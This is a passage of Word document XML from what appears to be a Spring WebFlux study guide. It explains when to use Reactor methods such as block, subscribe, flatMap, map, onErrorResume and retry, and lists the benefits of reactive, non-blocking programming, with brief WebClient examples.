        </w:rPr>
        <w:t xml:space="preserve"> (not recommended in production).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCC773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B065E82"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mono.block();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E647FC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ult: " + result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708724B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sult: Hello (executed synchronously)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B97C96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E44E2B">
          <v:rect id="_x0000_i2304" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="591687A7"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226"/>
        <w:gridCol w:w="932"/>
        <w:gridCol w:w="4102"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="4D531284" w14:textId="77777777" w:rsidTr="003C07EC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="505EE896"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ethod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="640D90F1"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="777E4E35"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locking?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="438B2D3B"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age Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="4C4C9F84" w14:textId="77777777" w:rsidTr="003C07EC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06FA22E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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4518CBC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rts reactive flow asynchronously</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="634F9545"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F1E666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flows, service logic, side effects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="62161218" w14:textId="77777777" w:rsidTr="003C07EC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32907A1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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BA7ECB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aits and retrieves the result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24300836"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61B7C53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ng, or bridging to blocking code only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03C0FC43"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97C188">
          <v:rect id="_x0000_i2305" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9A4C2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 Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4367C49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in production-level reactive apps. It defeats the purpose of non-blocking architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEDA194"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ed a quick example with Flux too?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B2E201" w14:textId="6717BDD7" w:rsidR="004A4102"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306" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27543A15" w14:textId="39D04E9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5" w:name="_Toc197867739"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>When should you use each of these methods</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="525"/>
    </w:p>
    <w:p w14:paraId="30516DA7" w14:textId="297A2B8F" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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when working with WebClient to make HTTP requests, you will primarily encounter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s the return types, and you might need to choose between methods like .block(), .subscribe(), and others based on your use case. Here's a breakdown of when to use each method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE874DD"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ubscribe():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D809E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when you want to perform the action </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronously</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without waiting for the response. It allows you to specify a callback that will handle the result once it is available, but it does not block the calling thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590148B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14FBEA5"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hen triggering side effects (logging, sending emails, etc.) that do not require waiting for the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5186D4"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non-blocking, fire-and-forget operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AE200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10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56393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02DD7A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5B613D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523A5B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3398B443"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4483CA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4CA23C"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lock():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F8B0C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you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>block the current thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and wait for the result. This is typically useful when integrating </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive cod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non-reactive code</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or when a synchronous result is needed (e.g., in a non-reactive application).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA27D5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7AF2B2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are integrating a reactive client (e.g., WebClient) into a legacy, synchronous system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06183C83"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he result immediately and cannot use the reactive flow, like when calling a service inside a synchronous method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD614E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ortant</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use this sparingly as it negates the advantages of non-blocking reactive programming, and can lead to thread contention and scalability issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EDAF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67E0DF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ponse = webClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE9681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14ADA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7FB8B6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C4D79E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lock();  // Blocks and waits for the response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7349B55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ponse: " + response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBE5CD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oOnTerminate():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFB76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xml:space="preserve"> when you need to perform some action (like logging or releasing resources) after the reactive stream completes or terminates (whether with success or error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0944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6AA349B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log when the request completes, irrespective of success or failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1550E31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5B25378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DD13DF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F44195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28CA67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8DB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Request completed"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501543F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5ADE680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flatMap():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2148A41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when you need to perform additional asynchronous operations inside your reactive chain. It allows you to flatten the result of another Mono or Flux into your existing reactive flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACBC2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600C266"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erform another asynchronous operation based on the response of a previous operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162EC2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AFA0D3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5DACE0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361DC4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F1A384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1BEEFC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post -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A66FBF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ssume another request that depends on the first one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDD9C4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get().uri("/comments/" + post).retrieve().bodyToMono(String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC156A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68F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subscribe(response -&gt; System.out.println("Comment: " + response));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D676F5B"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map():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0427E5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xml:space="preserve"> when you want to transform the result of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single value</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (such as from Mono) in the reactive pipeline. It is a synchronous transformation, and it doesn’t introduce additional asynchronous behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A116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03F46AA0"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o modify or convert the response data (e.g., extract certain fields, transform the data) without needing to make additional asynchronous calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AB3FC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EBADCB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1B0F72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6D07256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4632D92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7C0927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response.toUpperCase())  // Synchronously transforming the response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BECF8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Uppercase Response: " + response));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302BEC52"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onErrorResume():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2015D8D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8325B3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handle errors such as timeouts, 404 responses, etc., by providing a fallback response or retrying the operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE2DF4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9D252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47A7FC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invalid-id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128F7D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5E04C0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8D1F74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Fallback Response"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A07F18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3DC98B41"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etry():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F013D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xml:space="preserve"> when you want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically retry the operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in case of failure (for a certain number of attempts or based on certain conditions). This is particularly useful in scenarios where transient errors can occur, like network timeouts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5035965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32D557D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expect a certain level of reliability in external systems (e.g., a remote service) and want to retry on failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9834A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328476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B4718E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41920B8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AD16F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FB0189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3 times in case of failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ACE39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70A456FF"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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA5C7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Use for non-blocking, asynchronous actions where you don’t need to wait for the result immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AAF7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Use when you need to block and wait for the result, usually when integrating with non-reactive code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F7560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Use for chaining asynchronous operations that depend on previous results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AC5D8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Use for synchronous transformations of data in the reactive pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548DE99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Use for graceful error handling and fallback strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63478AB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Use for automatic retries in case of failure (e.g., network errors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA088A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ways prefer non-blocking and asynchronous methods lik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to maintain the non-blocking nature of reactive programming, and only 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absolutely necessary (usually in legacy or hybrid systems).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7333162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307" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1447EC08" w14:textId="6CA6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6" w:name="_Toc197867740"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What are some advantages of using reactive programming in web applications</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="526"/>
    </w:p>
    <w:p w14:paraId="2C3A0BAA" w14:textId="67CA7498" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA47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Non-blocking I/O:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAF704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enabl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 service is waiting for a database query result, the thread is not blocked, and the server can continue processing other requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5420C3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etter Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F61B1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are </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalable by design</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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With non-blocking behavior, your application can efficiently handle thousands of concurrent connections on fewer threads, which significantly improves scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3A74A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mproved Resource Utilization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9953C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reactive applications don't block threads while waiting for I/O operations (e.g., database or API calls), </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resources (CPU, memory) are used more efficiently</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This leads to better overall performance and reduces the overhead of creating and managing threads in traditional models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482ED1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more requests with fewer resources by reusing threads instead of constantly creating new ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473A4CDF"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of Asynchronous Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A3D3D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ideal for managing streams of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous data</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as events, notifications, or external data sources. It allows the system to react to changes in the data stream and perform operations when new data arrives, without blocking or waiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0201B36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chat application, reactive programming ensures messages are received and displayed without waiting for previous requests to finish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164B1111"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ackpressure Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DA6C94"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offers built-in </w:t>
      </w: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streaming services, backpressure ensures that data is delivered at a rate the client can handle, preventing memory overload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44503567"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al-time Processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541D7F17"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well-suited for </w:t>
      </w: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 xml:space="preserve"> applications such as messaging, social media feeds, financial services, and IoT devices. It enables your web application to handle real-time updates and events efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA18AE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financial dashboard displaying real-time stock prices can update instantly as new data streams in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725B32F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mproved User Experience:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBFD0A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the ability to handle multiple asynchronous operations concurrently, reactive applications offer </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>faster and more responsive</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> user experiences. Users do not have to wait for one request to complete before another is processed, reducing perceived latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB562A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application that loads data in chunks (e.g., infinite scroll) without blocking the UI will offer a smoother, faster user experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05975AE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Event-driven Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A87BBB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naturally supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is a design where the flow of the program is determined by events, such as user actions, messages from other services, or external system triggers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64394D3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Microservices that communicate with each other using event-driven models (e.g., Kafka, RabbitMQ) can be built with reactive programming to ensure efficient handling of events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05545336"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Improved Fault Tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F08E76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can be more </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resilient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to failures. They can continue operating even if certain parts of the system are slow or temporarily unavailable, thanks to features like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retry logi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allback mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A146E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n external API is down, the application can handle the error gracefully and proceed with a cached response or a default value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D29335A"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10. Easier to Handle Complex Workflows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A3E91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mplex workflows that involve multiple asynchronous operations can be managed more easily with reactive programming, as it simplifies chaining of operations and error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B314E86"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ulti-step process like submitting a form, validating the input, saving the data to the database, and sending a confirmation email can all be done in a reactive, non-blocking way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9E559B"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Concurrency Without Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E46D68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using complex concurrency models like thread pools and mutexes, reactive programming allows you to chain asynchronous operations declaratively, minimizing the potential for race conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6562E8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Better Handling of Slow Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7B926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that calls multiple external APIs for data can make all the calls concurrently without blocking each one, reducing overall response time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B87EC7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3. Cleaner, More Maintainable Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3886D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encourages writing code in a declarative, readable manner, which can be easier to maintain, as complex logic is broken down into smaller, composable units that are easier to test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285DBD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Handling user input validation, transformation, and server response can be done in a single, reactive pipeline, which is easier to understand compared to complex callback chains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4DDE0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94AE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308" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9E2B12" w14:textId="486B8E3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7" w:name="_Toc197867741"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does non-blocking I/O enhance application performance</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="527"/>
    </w:p>
    <w:p w14:paraId="1256FEF2" w14:textId="71850F07"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duced Resource Usage (Thread Efficiency):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AA513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contrast,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allows the thread to initiate an I/O operation and continue doing other tasks while waiting for the I/O to complete. This reduces the number of threads required to handle many I/O requests, leading to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>better CPU and memory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less overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
